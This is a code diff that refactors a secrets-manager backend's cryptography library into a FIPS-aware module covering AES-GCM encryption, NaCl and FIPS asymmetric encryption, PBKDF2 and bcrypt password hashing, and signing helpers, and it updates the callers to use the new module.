+  const $setFipsModeEnabled = (enabled: boolean) => {
+    // If FIPS is enabled, we need to validate that the ENCRYPTION_KEY is in a base64 format, and is a 256-bit key.
+    if (enabled) {
+      crypto.setFips(true);
+
+      const appCfg = getConfig();
+
+      if (appCfg.ENCRYPTION_KEY) {
+        // we need to validate that the ENCRYPTION_KEY is a base64 encoded 256-bit key
+
+        // note(daniel): for some reason this resolves as true for some hex-encoded strings.
+        if (!isBase64(appCfg.ENCRYPTION_KEY)) {
+          throw new CryptographyError({
+            message:
+              "FIPS mode is enabled, but the ENCRYPTION_KEY environment variable is not a base64 encoded 256-bit key.\nYou can generate a 256-bit key using the following command: `openssl rand -base64 32`"
+          });
+        }
+
+        if (bytesToBits(Buffer.from(appCfg.ENCRYPTION_KEY, "base64").length) !== 256) {
+          throw new CryptographyError({
+            message:
+              "FIPS mode is enabled, but the ENCRYPTION_KEY environment variable is not a 256-bit key.\nYou can generate a 256-bit key using the following command: `openssl rand -base64 32`"
+          });
+        }
+      } else {
+        throw new CryptographyError({
+          message:
+            "FIPS mode is enabled, but the ENCRYPTION_KEY environment variable is not set.\nYou can generate a 256-bit key using the following command: `openssl rand -base64 32`"
+        });
+      }
+    }
+    $fipsEnabled = enabled;
+    $isInitialized = true;
+  };
+
+  const initialize = async (superAdminDAL: TSuperAdminDALFactory) => {
+    if ($isInitialized) {
+      return isFipsModeEnabled();
+    }
+
+    if (process.env.FIPS_ENABLED !== "true") {
+      logger.info("[FIPS]: Instance is running in non-FIPS mode.");
+      $setFipsModeEnabled(false);
+      return false;
+    }
+
+    const serverCfg = await superAdminDAL.findById(ADMIN_CONFIG_DB_UUID).catch(() => null);
+
+    // if fips mode is enabled, we need to check if the deployment is a new deployment or an old one.
+    if (serverCfg) {
+      if (serverCfg.fipsEnabled) {
+        logger.info("[FIPS]: Instance is configured for FIPS mode of operation. Continuing startup with FIPS enabled.");
+        $setFipsModeEnabled(true);
+        return true;
+      }
+      logger.info("[FIPS]: Instance age predates FIPS mode inception date. Continuing without FIPS.");
+      $setFipsModeEnabled(false);
+      return false;
+    }
+
+    logger.info("[FIPS]: First time initializing cryptography module on a new deployment. FIPS mode is enabled.");
+
+    // TODO(daniel): check if it's an enterprise deployment
+
+    // if there is no server cfg, and FIPS_MODE is `true`, its a fresh FIPS deployment. We need to set the fipsEnabled to true.
+    $setFipsModeEnabled(true);
+    return true;
+  };
+
+  const encryption = () => {
+    $checkIsInitialized();
+
+    const asymmetric = () => {
+      const generateKeyPair = async () => {
+        if (isFipsModeEnabled()) {
+          const keyPair = await asymmetricFipsValidated().generateKeyPair();
+          return keyPair;
+        }
+        return generateAsymmetricKeyPairNoFipsValidation();
+      };
+
+      const encrypt = (data: string, publicKey: string, privateKey: string) => {
+        if (isFipsModeEnabled()) {
+          return asymmetricFipsValidated().encryptAsymmetric(data, publicKey, privateKey);
+        }
+        return encryptAsymmetricNoFipsValidation(data, publicKey, privateKey);
+      };
+
+      const decrypt = ({ ciphertext, nonce, publicKey, privateKey }: TDecryptAsymmetricInput) => {
+        if (isFipsModeEnabled()) {
+          return asymmetricFipsValidated().decryptAsymmetric({ ciphertext, nonce, publicKey, privateKey });
+        }
+        return decryptAsymmetricNoFipsValidation({ ciphertext, nonce, publicKey, privateKey });
+      };
+
+      return {
+        generateKeyPair,
+        encrypt,
+        decrypt
+      };
+    };
+
+    const symmetric = () => {
+      const decrypt = ({ ciphertext, iv, tag, key, keySize }: TDecryptSymmetricInput): string => {
+        let decipher;
+
+        if (keySize === SymmetricKeySize.Bits128) {
+          // Not ideal: 128-bit hex key (32 chars) gets interpreted as 32 UTF-8 bytes (256 bits)
+          // This works but reduces effective key entropy from 256 to 128 bits
+          decipher = crypto.createDecipheriv(SecretEncryptionAlgo.AES_256_GCM, key, Buffer.from(iv, "base64"));
+        } else {
+          const secretKey = crypto.createSecretKey(key, "base64");
+          decipher = crypto.createDecipheriv(SecretEncryptionAlgo.AES_256_GCM, secretKey, Buffer.from(iv, "base64"));
+        }
+
+        decipher.setAuthTag(Buffer.from(tag, "base64"));
+        let cleartext = decipher.update(ciphertext, "base64", "utf8");
+        cleartext += decipher.final("utf8");
+
+        return cleartext;
+      };
+
+      const encrypt = ({ plaintext, key, keySize }: TEncryptSymmetricInput) => {
+        let iv;
+        let cipher;
+
+        if (keySize === SymmetricKeySize.Bits128) {
+          iv = crypto.randomBytes(BLOCK_SIZE_BYTES_16);
+          cipher = crypto.createCipheriv(SecretEncryptionAlgo.AES_256_GCM, key, iv);
+        } else {
+          iv = crypto.randomBytes(IV_BYTES_SIZE);
+          cipher = crypto.createCipheriv(SecretEncryptionAlgo.AES_256_GCM, crypto.createSecretKey(key, "base64"), iv);
+        }
+
+        let ciphertext = cipher.update(plaintext, "utf8", "base64");
+        ciphertext += cipher.final("base64");
+
+        return {
+          ciphertext,
+          iv: iv.toString("base64"),
+          tag: cipher.getAuthTag().toString("base64")
+        };
+      };
+
+      const encryptWithRootEncryptionKey = (data: string) => {
+        const appCfg = getConfig();
+        const rootEncryptionKey = appCfg.ROOT_ENCRYPTION_KEY;
+        const encryptionKey = appCfg.ENCRYPTION_KEY;
+
+        if (rootEncryptionKey) {
+          const { iv, tag, ciphertext } = encrypt({
+            plaintext: data,
+            key: rootEncryptionKey,
+            keySize: SymmetricKeySize.Bits256
+          });
+          return {
+            iv,
+            tag,
+            ciphertext,
+            algorithm: SecretEncryptionAlgo.AES_256_GCM,
+            encoding: SecretKeyEncoding.BASE64
+          };
+        }
+        if (encryptionKey) {
+          const { iv, tag, ciphertext } = encrypt({
+            plaintext: data,
+            key: encryptionKey,
+            keySize: SymmetricKeySize.Bits128
+          });
+          return {
+            iv,
+            tag,
+            ciphertext,
+            algorithm: SecretEncryptionAlgo.AES_256_GCM,
+            encoding: SecretKeyEncoding.UTF8
+          };
+        }
+        throw new CryptographyError({
+          message: "Missing both encryption keys"
+        });
+      };
+
+      const decryptWithRootEncryptionKey = <T = string>({
+        keyEncoding,
+        ciphertext,
+        tag,
+        iv
+      }: Omit<TDecryptSymmetricInput, "key" | "keySize"> & {
+        keyEncoding: SecretKeyEncoding;
+      }) => {
+        const appCfg = getConfig();
+        // the or gate is used used in migration
+        const rootEncryptionKey = appCfg?.ROOT_ENCRYPTION_KEY || process.env.ROOT_ENCRYPTION_KEY;
+        const encryptionKey = appCfg?.ENCRYPTION_KEY || process.env.ENCRYPTION_KEY;
+        if (rootEncryptionKey && keyEncoding === SecretKeyEncoding.BASE64) {
+          const data = symmetric().decrypt({
+            key: rootEncryptionKey,
+            iv,
+            tag,
+            ciphertext,
+            keySize: SymmetricKeySize.Bits256
+          });
+          return data as T;
+        }
+        if (encryptionKey && keyEncoding === SecretKeyEncoding.UTF8) {
+          const data = symmetric().decrypt({
+            key: encryptionKey,
+            iv,
+            tag,
+            ciphertext,
+            keySize: SymmetricKeySize.Bits128
+          });
+          return data as T;
+        }
+        throw new CryptographyError({
+          message: "Missing both encryption keys"
+        });
+      };
+
+      return {
+        decrypt,
+        encrypt,
+        encryptWithRootEncryptionKey,
+        decryptWithRootEncryptionKey
+      };
+    };
+
+    return {
+      asymmetric,
+      symmetric
+    };
+  };
+
+  const hashing = () => {
+    $checkIsInitialized();
+    // mark this function as deprecated
+    /**
+     * @deprecated Do not use MD5 unless you absolutely have to. It is considered an unsafe hashing algorithm, and should only be used if absolutely necessary.
+     */
+    const md5 = (message: string, digest: DigestType = DigestType.Hex) => {
+      // If FIPS is enabled and we need MD5, we use the crypto-js implementation.
+      // Avoid this at all costs unless strictly necessary, like for mongo atlas digest auth.
+      if (isFipsModeEnabled()) {
+        return computeMd5(message, digest);
+      }
+      return crypto.createHash("md5").update(message).digest(digest);
+    };
+
+    const createHash = async (password: string, saltRounds: number) => {
+      if (isFipsModeEnabled()) {
+        const hasher = hasherFipsValidated();
+
+        const hash = await hasher.hash(password, saltRounds);
+        return hash;
+      }
+      const hash = await bcrypt.hash(password, saltRounds);
+      return hash;
+    };
+
+    const compareHash = async (password: string, hash: string) => {
+      if (isFipsModeEnabled()) {
+        const isValid = await hasherFipsValidated().compare(password, hash);
+        return isValid;
+      }
+      const isValid = await bcrypt.compare(password, hash);
+      return isValid;
+    };
+
+    return {
+      md5,
+      createHash,
+      compareHash
+    };
+  };
+  const jwt = () => {
+    $checkIsInitialized();
+
+    return {
+      sign: jwtDep.sign,
+      verify: jwtDep.verify,
+      decode: jwtDep.decode
+    };
+  };
+
+  return {
+    initialize,
+    isFipsModeEnabled,
+    verifyFipsLicense,
+    hashing,
+    encryption,
+    jwt,
+    randomBytes: crypto.randomBytes,
+    randomInt: crypto.randomInt,
+    rawCrypto: {
+      createHash: crypto.createHash,
+      createHmac: crypto.createHmac,
+      sign: crypto.sign,
+      verify: crypto.verify,
+      createSign: crypto.createSign,
+      createVerify: crypto.createVerify,
+      generateKeyPair: crypto.generateKeyPair,
+      createCipheriv: crypto.createCipheriv,
+      createDecipheriv: crypto.createDecipheriv,
+      createPublicKey: crypto.createPublicKey,
+      createPrivateKey: crypto.createPrivateKey,
+      getRandomValues: crypto.getRandomValues,
+      randomUUID: crypto.randomUUID,
+      subtle: {
+        generateKey: subtle.generateKey.bind(subtle),
+        importKey: subtle.importKey.bind(subtle),
+        exportKey: subtle.exportKey.bind(subtle)
+      },
+      constants: crypto.constants,
+      X509Certificate: crypto.X509Certificate,
+      KeyObject: crypto.KeyObject,
+      Hash: crypto.Hash
+    }
+  };
+};
+
+const factoryInstance = cryptographyFactory();
+
+export { factoryInstance as crypto, DigestType };

backend/src/lib/crypto/cryptography/hash-fips.ts

@@ -0,0 +1,107 @@
+import crypto from "crypto";
+
+import { CryptographyError } from "@app/lib/errors";
+
+export const hasherFipsValidated = () => {
+  const keySize = 32;
+
+  // For the salt when using pkdf2, we do salt rounds^6. If the salt rounds are 10, this will result in 10^6 = 1.000.000 iterations.
+  // The reason for this is because pbkdf2 is not as compute intense as bcrypt, making it faster to brute-force.
+  // From my testing, doing salt rounds^6 brings the computational power required to a little more than bcrypt.
+  // OWASP recommends a minimum of 600.000 iterations for pbkdf2, so 1.000.000 is more than enough.
+  // Ref: https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2
+  const MIN_COST_FACTOR = 10;
+  const MAX_COST_FACTOR = 20; // Iterations scales polynomial (costFactor^6), so we need an upper bound
+
+  const $calculateIterations = (costFactor: number) => {
+    return Math.round(costFactor ** 6);
+  };
+
+  const $hashPassword = (password: Buffer, salt: Buffer, iterations: number, keyLength: number) => {
+    return new Promise<Buffer>((resolve, reject) => {
+      crypto.pbkdf2(password, salt, iterations, keyLength, "sha256", (err, derivedKey) => {
+        if (err) {
+          return reject(err);
+        }
+        resolve(derivedKey);
+      });
+    });
+  };
+
+  const $validatePassword = async (
+    inputPassword: Buffer,
+    storedHash: Buffer,
+    salt: Buffer,
+    iterations: number,
+    keyLength: number
+  ) => {
+    const computedHash = await $hashPassword(inputPassword, salt, iterations, keyLength);
+
+    return crypto.timingSafeEqual(computedHash, storedHash);
+  };
+
+  const hash = async (password: string, costFactor: number) => {
+    // Strict input validation
+    if (typeof password !== "string" || password.length === 0) {
+      throw new CryptographyError({
+        message: "Invalid input, password must be a non-empty string"
+      });
+    }
+
+    if (!Number.isInteger(costFactor)) {
+      throw new CryptographyError({
+        message: "Invalid cost factor, must be an integer"
+      });
+    }
+
+    if (costFactor < MIN_COST_FACTOR || costFactor > MAX_COST_FACTOR) {
+      throw new CryptographyError({
+        message: `Invalid cost factor, must be between ${MIN_COST_FACTOR} and ${MAX_COST_FACTOR}`
+      });
+    }
+
+    const iterations = $calculateIterations(costFactor);
+
+    const salt = crypto.randomBytes(16);
+    const derivedKey = await $hashPassword(Buffer.from(password), salt, iterations, keySize);
+
+    const combined = Buffer.concat([salt, derivedKey]);
+    return `$v1$${costFactor}$${combined.toString("base64")}`; // Store original costFactor!
+  };
+
+  const compare = async (password: string, hashedPassword: string) => {
+    try {
+      if (!hashedPassword?.startsWith("$v1$")) return false;
+
+      const parts = hashedPassword.split("$");
+      if (parts.length !== 4) return false;
+
+      const [, , storedCostFactor, combined] = parts;
+
+      if (
+        !Number.isInteger(Number(storedCostFactor)) ||
+        Number(storedCostFactor) < MIN_COST_FACTOR ||
+        Number(storedCostFactor) > MAX_COST_FACTOR
+      ) {
+        return false;
+      }
+
+      const combinedBuffer = Buffer.from(combined, "base64");
+      const salt = combinedBuffer.subarray(0, 16);
+      const storedHash = combinedBuffer.subarray(16);
+
+      const iterations = $calculateIterations(Number(storedCostFactor));
+
+      const isMatch = await $validatePassword(Buffer.from(password), storedHash, salt, iterations, keySize);
+
+      return isMatch;
+    } catch {
+      return false;
+    }
+  };
+
+  return {
+    hash,
+    compare
+  };
+};

backend/src/lib/crypto/cryptography/index.ts

@@ -0,0 +1,8 @@
+export { crypto } from "./crypto";
+export type {
+  TDecryptAsymmetricInput,
+  TDecryptSymmetricInput,
+  TEncryptedWithRootEncryptionKey,
+  TEncryptSymmetricInput
+} from "./types";
+export { DigestType, SymmetricKeySize } from "./types";

backend/src/lib/crypto/cryptography/types.ts

@@ -0,0 +1,54 @@
+import { SecretEncryptionAlgo, SecretKeyEncoding } from "@app/db/schemas";
+
+export enum DigestType {
+  Hex = "hex",
+  Base64 = "base64"
+}
+
+export enum SymmetricKeySize {
+  Bits128 = "128-bits",
+  Bits256 = "256-bits"
+}
+
+export type TDecryptSymmetricInput =
+  | {
+      ciphertext: string;
+      iv: string;
+      tag: string;
+      key: string | Buffer; // can be hex encoded or buffer
+      keySize: SymmetricKeySize.Bits128;
+    }
+  | {
+      ciphertext: string;
+      iv: string;
+      tag: string;
+      key: string; // must be base64 encoded
+      keySize: SymmetricKeySize.Bits256;
+    };
+
+export type TEncryptSymmetricInput =
+  | {
+      plaintext: string;
+      key: string;
+      keySize: SymmetricKeySize.Bits256;
+    }
+  | {
+      plaintext: string;
+      key: string | Buffer;
+      keySize: SymmetricKeySize.Bits128;
+    };
+
+export type TDecryptAsymmetricInput = {
+  ciphertext: string;
+  nonce: string;
+  publicKey: string;
+  privateKey: string;
+};
+
+export type TEncryptedWithRootEncryptionKey = {
+  iv: string;
+  tag: string;
+  ciphertext: string;
+  algorithm: SecretEncryptionAlgo;
+  encoding: SecretKeyEncoding;
+};

backend/src/lib/crypto/encryption.ts

@@ -1,133 +1,10 @@
-import crypto from "node:crypto";
-
 import argon2 from "argon2";
-import nacl from "tweetnacl";
-import naclUtils from "tweetnacl-util";
 
-import { SecretEncryptionAlgo, SecretKeyEncoding } from "@app/db/schemas";
+import { SecretKeyEncoding } from "@app/db/schemas";
 
-import { getConfig } from "../config/env";
+import { crypto, SymmetricKeySize } from "./cryptography";
 
-export const decodeBase64 = (s: string) => naclUtils.decodeBase64(s);
+type TBuildSecretBlindIndexDTO = {
-export const encodeBase64 = (u: Uint8Array) => naclUtils.encodeBase64(u);
-
-export const randomSecureBytes = (length = 32) => crypto.randomBytes(length);
-
-export type TDecryptSymmetricInput = {
-  ciphertext: string;
-  iv: string;
-  tag: string;
-  key: string;
-};
-export const IV_BYTES_SIZE = 12;
-export const BLOCK_SIZE_BYTES_16 = 16;
-
-export const decryptSymmetric = ({ ciphertext, iv, tag, key }: TDecryptSymmetricInput): string => {
-  const secretKey = crypto.createSecretKey(key, "base64");
-
-  const decipher = crypto.createDecipheriv(SecretEncryptionAlgo.AES_256_GCM, secretKey, Buffer.from(iv, "base64"));
-  decipher.setAuthTag(Buffer.from(tag, "base64"));
-  let cleartext = decipher.update(ciphertext, "base64", "utf8");
-  cleartext += decipher.final("utf8");
-
-  return cleartext;
-};
-
-export const encryptSymmetric = (plaintext: string, key: string) => {
-  const iv = crypto.randomBytes(IV_BYTES_SIZE);
-
-  const secretKey = crypto.createSecretKey(key, "base64");
-  const cipher = crypto.createCipheriv(SecretEncryptionAlgo.AES_256_GCM, secretKey, iv);
-
-  let ciphertext = cipher.update(plaintext, "utf8", "base64");
-  ciphertext += cipher.final("base64");
-
-  return {
-    ciphertext,
-    iv: iv.toString("base64"),
-    tag: cipher.getAuthTag().toString("base64")
-  };
-};
-
-export const encryptSymmetric128BitHexKeyUTF8 = (plaintext: string, key: string | Buffer) => {
-  const iv = crypto.randomBytes(BLOCK_SIZE_BYTES_16);
-  const cipher = crypto.createCipheriv(SecretEncryptionAlgo.AES_256_GCM, key, iv);
-
-  let ciphertext = cipher.update(plaintext, "utf8", "base64");
-  ciphertext += cipher.final("base64");
-
-  return {
-    ciphertext,
-    iv: iv.toString("base64"),
-    tag: cipher.getAuthTag().toString("base64")
-  };
-};
-
-export const decryptSymmetric128BitHexKeyUTF8 = ({
-  ciphertext,
-  iv,
-  tag,
-  key
-}: Omit<TDecryptSymmetricInput, "key"> & { key: string | Buffer }): string => {
-  const decipher = crypto.createDecipheriv(SecretEncryptionAlgo.AES_256_GCM, key, Buffer.from(iv, "base64"));
-
-  decipher.setAuthTag(Buffer.from(tag, "base64"));
-
-  let cleartext = decipher.update(ciphertext, "base64", "utf8");
-  cleartext += decipher.final("utf8");
-
-  return cleartext;
-};
-
-export const encryptAsymmetric = (plaintext: string, publicKey: string, privateKey: string) => {
-  const nonce = nacl.randomBytes(24);
-  const ciphertext = nacl.box(
-    naclUtils.decodeUTF8(plaintext),
-    nonce,
-    naclUtils.decodeBase64(publicKey),
-    naclUtils.decodeBase64(privateKey)
-  );
-
-  return {
-    ciphertext: naclUtils.encodeBase64(ciphertext),
-    nonce: naclUtils.encodeBase64(nonce)
-  };
-};
-
-export type TDecryptAsymmetricInput = {
-  ciphertext: string;
-  nonce: string;
-  publicKey: string;
-  privateKey: string;
-};
-
-export const decryptAsymmetric = ({ ciphertext, nonce, publicKey, privateKey }: TDecryptAsymmetricInput) => {
-  const plaintext: Uint8Array | null = nacl.box.open(
-    naclUtils.decodeBase64(ciphertext),
-    naclUtils.decodeBase64(nonce),
-    naclUtils.decodeBase64(publicKey),
-    naclUtils.decodeBase64(privateKey)
-  );
-
-  if (plaintext == null) throw Error("Invalid ciphertext or keys");
-
-  return naclUtils.encodeUTF8(plaintext);
-};
-
-export const generateSymmetricKey = (size = 32) => crypto.randomBytes(size).toString("base64");
-
-export const generateHash = (value: string | Buffer) => crypto.createHash("sha256").update(value).digest("hex");
-
-export const generateAsymmetricKeyPair = () => {
-  const pair = nacl.box.keyPair();
-
-  return {
-    publicKey: naclUtils.encodeBase64(pair.publicKey),
-    privateKey: naclUtils.encodeBase64(pair.secretKey)
-  };
-};
-
-export type TGenSecretBlindIndex = {
   secretName: string;
   keyEncoding: SecretKeyEncoding;
   rootEncryptionKey?: string;
@@ -137,6 +14,10 @@ export type TGenSecretBlindIndex = {
   ciphertext: string;
 };
 
+/**
+ *
+ * @deprecated `buildSecretBlindIndexFromName` is no longer used for newer projects. It remains a relic from V1 secrets which is still supported on very old projects.
+ */
 export const buildSecretBlindIndexFromName = async ({
   secretName,
   ciphertext,
@@ -145,13 +26,19 @@ export const buildSecretBlindIndexFromName = async ({
   tag,
   encryptionKey,
   rootEncryptionKey
-}: TGenSecretBlindIndex) => {
+}: TBuildSecretBlindIndexDTO) => {
   if (!encryptionKey && !rootEncryptionKey) throw new Error("Missing secret blind index key");
   let salt = "";
   if (rootEncryptionKey && keyEncoding === SecretKeyEncoding.BASE64) {
-    salt = decryptSymmetric({ iv, ciphertext, key: rootEncryptionKey, tag });
+    salt = crypto
+      .encryption()
+      .symmetric()
+      .decrypt({ iv, ciphertext, key: rootEncryptionKey, tag, keySize: SymmetricKeySize.Bits256 });
   } else if (encryptionKey && keyEncoding === SecretKeyEncoding.UTF8) {
-    salt = decryptSymmetric128BitHexKeyUTF8({ iv, ciphertext, key: encryptionKey, tag });
+    salt = crypto
+      .encryption()
+      .symmetric()
+      .decrypt({ iv, ciphertext, key: encryptionKey, tag, keySize: SymmetricKeySize.Bits128 });
   }
   if (!salt) throw new Error("Missing secret blind index key");
 
@@ -167,75 +54,3 @@ export const buildSecretBlindIndexFromName = async ({
 
   return secretBlindIndex.toString("base64");
 };
-
-export const createSecretBlindIndex = (rootEncryptionKey?: string, encryptionKey?: string) => {
-  if (!encryptionKey && !rootEncryptionKey) throw new Error("Atleast one encryption key needed");
-  const salt = crypto.randomBytes(16).toString("base64");
-  if (rootEncryptionKey) {
-    const data = encryptSymmetric(salt, rootEncryptionKey);
-    return {
-      ...data,
-      algorithm: SecretEncryptionAlgo.AES_256_GCM,
-      keyEncoding: SecretKeyEncoding.BASE64
-    };
-  }
-  if (encryptionKey) {
-    const data = encryptSymmetric128BitHexKeyUTF8(salt, encryptionKey);
-    return {
-      ...data,
-      algorithm: SecretEncryptionAlgo.AES_256_GCM,
-      keyEncoding: SecretKeyEncoding.UTF8
-    };
-  }
-  throw new Error("Failed to generate blind index due to encryption key missing");
-};
-
-export const infisicalSymmetricEncypt = (data: string) => {
-  const appCfg = getConfig();
-  const rootEncryptionKey = appCfg.ROOT_ENCRYPTION_KEY;
-  const encryptionKey = appCfg.ENCRYPTION_KEY;
-  if (rootEncryptionKey) {
-    const { iv, tag, ciphertext } = encryptSymmetric(data, rootEncryptionKey);
-    return {
-      iv,
-      tag,
-      ciphertext,
-      algorithm: SecretEncryptionAlgo.AES_256_GCM,
-      encoding: SecretKeyEncoding.BASE64
-    };
-  }
-  if (encryptionKey) {
-    const { iv, tag, ciphertext } = encryptSymmetric128BitHexKeyUTF8(data, encryptionKey);
-    return {
-      iv,
-      tag,
-      ciphertext,
-      algorithm: SecretEncryptionAlgo.AES_256_GCM,
-      encoding: SecretKeyEncoding.UTF8
-    };
-  }
-  throw new Error("Missing both encryption keys");
-};
-
-export const infisicalSymmetricDecrypt = <T = string>({
-  keyEncoding,
-  ciphertext,
-  tag,
-  iv
-}: Omit<TDecryptSymmetricInput, "key"> & {
-  keyEncoding: SecretKeyEncoding;
-}) => {
-  const appCfg = getConfig();
-  // the or gate is used used in migration
-  const rootEncryptionKey = appCfg?.ROOT_ENCRYPTION_KEY || process.env.ROOT_ENCRYPTION_KEY;
-  const encryptionKey = appCfg?.ENCRYPTION_KEY || process.env.ENCRYPTION_KEY;
-  if (rootEncryptionKey && keyEncoding === SecretKeyEncoding.BASE64) {
-    const data = decryptSymmetric({ key: rootEncryptionKey, iv, tag, ciphertext });
-    return data as T;
-  }
-  if (encryptionKey && keyEncoding === SecretKeyEncoding.UTF8) {
-    const data = decryptSymmetric128BitHexKeyUTF8({ key: encryptionKey, iv, tag, ciphertext });
-    return data as T;
-  }
-  throw new Error("Missing both encryption keys");
-};

backend/src/lib/crypto/index.ts

@@ -1,17 +1,5 @@
-export {
+export { crypto, SymmetricKeySize } from "./cryptography";
-  buildSecretBlindIndexFromName,
+export { buildSecretBlindIndexFromName } from "./encryption";
-  createSecretBlindIndex,
-  decodeBase64,
-  decryptAsymmetric,
-  decryptSymmetric,
-  decryptSymmetric128BitHexKeyUTF8,
-  encodeBase64,
-  encryptAsymmetric,
-  encryptSymmetric,
-  encryptSymmetric128BitHexKeyUTF8,
-  generateAsymmetricKeyPair,
-  randomSecureBytes
-} from "./encryption";
 export {
   decryptIntegrationAuths,
   decryptSecretApprovals,

backend/src/lib/crypto/secret-encryption.ts

@@ -1,4 +1,4 @@
-import crypto from "crypto";
+import nodeCrypto from "crypto";
 import { z } from "zod";
 
 import {
@@ -12,7 +12,7 @@ import {
   TSecrets,
   TSecretVersions
 } from "../../db/schemas";
-import { decryptAsymmetric } from "./encryption";
+import { crypto } from "./cryptography";
 
 const DecryptedValuesSchema = z.object({
   id: z.string(),
@@ -68,7 +68,7 @@ const decryptCipher = ({
   tag: string;
   key: string | Buffer;
 }) => {
-  const decipher = crypto.createDecipheriv("aes-256-gcm", key, Buffer.from(iv, "base64"));
+  const decipher = nodeCrypto.createDecipheriv("aes-256-gcm", key, Buffer.from(iv, "base64"));
   decipher.setAuthTag(Buffer.from(tag, "base64"));
 
   let cleartext = decipher.update(ciphertext, "base64", "utf8");
@@ -91,7 +91,7 @@ const getDecryptedValues = (data: Array<{ ciphertext: string; iv: string; tag: s
   return results;
 };
 export const decryptSecrets = (encryptedSecrets: TSecrets[], privateKey: string, latestKey: TLatestKey) => {
-  const key = decryptAsymmetric({
+  const key = crypto.encryption().asymmetric().decrypt({
     ciphertext: latestKey.encryptedKey,
     nonce: latestKey.nonce,
     publicKey: latestKey.sender.publicKey,
@@ -143,7 +143,7 @@ export const decryptSecretVersions = (
   privateKey: string,
   latestKey: TLatestKey
 ) => {
-  const key = decryptAsymmetric({
+  const key = crypto.encryption().asymmetric().decrypt({
     ciphertext: latestKey.encryptedKey,
     nonce: latestKey.nonce,
     publicKey: latestKey.sender.publicKey,
@@ -195,7 +195,7 @@ export const decryptSecretApprovals = (
   privateKey: string,
   latestKey: TLatestKey
 ) => {
-  const key = decryptAsymmetric({
+  const key = crypto.encryption().asymmetric().decrypt({
     ciphertext: latestKey.encryptedKey,
     nonce: latestKey.nonce,
     publicKey: latestKey.sender.publicKey,
@@ -247,7 +247,7 @@ export const decryptIntegrationAuths = (
   privateKey: string,
   latestKey: TLatestKey
 ) => {
-  const key = decryptAsymmetric({
+  const key = crypto.encryption().asymmetric().decrypt({
     ciphertext: latestKey.encryptedKey,
     nonce: latestKey.nonce,
     publicKey: latestKey.sender.publicKey,

backend/src/lib/crypto/sign/signing.ts

@@ -1,9 +1,9 @@
 import { execFile } from "child_process";
-import crypto from "crypto";
 import fs from "fs/promises";
 import path from "path";
 import { promisify } from "util";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { cleanTemporaryDirectory, createTemporaryDirectory, writeToTemporaryFile } from "@app/lib/files";
 import { logger } from "@app/lib/logger";
@@ -43,19 +43,19 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
       case SigningAlgorithm.RSASSA_PSS_SHA_512:
         return {
           hashAlgorithm: SupportedHashAlgorithm.SHA512,
-          padding: crypto.constants.RSA_PKCS1_PSS_PADDING,
+          padding: crypto.rawCrypto.constants.RSA_PKCS1_PSS_PADDING,
           saltLength: SHA512_DIGEST_LENGTH
         };
       case SigningAlgorithm.RSASSA_PSS_SHA_256:
         return {
           hashAlgorithm: SupportedHashAlgorithm.SHA256,
-          padding: crypto.constants.RSA_PKCS1_PSS_PADDING,
+          padding: crypto.rawCrypto.constants.RSA_PKCS1_PSS_PADDING,
           saltLength: SHA256_DIGEST_LENGTH
         };
       case SigningAlgorithm.RSASSA_PSS_SHA_384:
         return {
           hashAlgorithm: SupportedHashAlgorithm.SHA384,
-          padding: crypto.constants.RSA_PKCS1_PSS_PADDING,
+          padding: crypto.rawCrypto.constants.RSA_PKCS1_PSS_PADDING,
           saltLength: SHA384_DIGEST_LENGTH
         };
 
@@ -63,17 +63,17 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
       case SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_512:
         return {
           hashAlgorithm: SupportedHashAlgorithm.SHA512,
-          padding: crypto.constants.RSA_PKCS1_PADDING
+          padding: crypto.rawCrypto.constants.RSA_PKCS1_PADDING
         };
       case SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_384:
         return {
           hashAlgorithm: SupportedHashAlgorithm.SHA384,
-          padding: crypto.constants.RSA_PKCS1_PADDING
+          padding: crypto.rawCrypto.constants.RSA_PKCS1_PADDING
         };
       case SigningAlgorithm.RSASSA_PKCS1_V1_5_SHA_256:
         return {
           hashAlgorithm: SupportedHashAlgorithm.SHA256,
-          padding: crypto.constants.RSA_PKCS1_PADDING
+          padding: crypto.rawCrypto.constants.RSA_PKCS1_PADDING
         };
 
       // ECDSA
@@ -389,7 +389,7 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
       return signature;
     }
 
-    const privateKeyObject = crypto.createPrivateKey({
+    const privateKeyObject = crypto.rawCrypto.createPrivateKey({
       key: privateKey,
       format: "pem",
       type: "pkcs8"
@@ -397,7 +397,7 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
 
     // For RSA signatures
     if (signingAlgorithm.startsWith("RSA")) {
-      const signer = crypto.createSign(hashAlgorithm);
+      const signer = crypto.rawCrypto.createSign(hashAlgorithm);
       signer.update(data);
 
       return signer.sign({
@@ -408,7 +408,7 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
     }
     if (signingAlgorithm.startsWith("ECDSA")) {
       // For ECDSA signatures
-      const signer = crypto.createSign(hashAlgorithm);
+      const signer = crypto.rawCrypto.createSign(hashAlgorithm);
       signer.update(data);
       return signer.sign({
         key: privateKeyObject,
@@ -452,7 +452,7 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
         return signatureValid;
       }
 
-      const publicKeyObject = crypto.createPublicKey({
+      const publicKeyObject = crypto.rawCrypto.createPublicKey({
         key: publicKey,
         format: "der",
         type: "spki"
@@ -460,7 +460,7 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
 
       // For RSA signatures
       if (signingAlgorithm.startsWith("RSA")) {
-        const verifier = crypto.createVerify(hashAlgorithm);
+        const verifier = crypto.rawCrypto.createVerify(hashAlgorithm);
         verifier.update(data);
 
         return verifier.verify(
@@ -474,7 +474,7 @@ export const signingService = (algorithm: AsymmetricKeyAlgorithm): TAsymmetricSi
       }
       // For ECDSA signatures
       if (signingAlgorithm.startsWith("ECDSA")) {
-        const verifier = crypto.createVerify(hashAlgorithm);
+        const verifier = crypto.rawCrypto.createVerify(hashAlgorithm);
         verifier.update(data);
         return verifier.verify(
           {
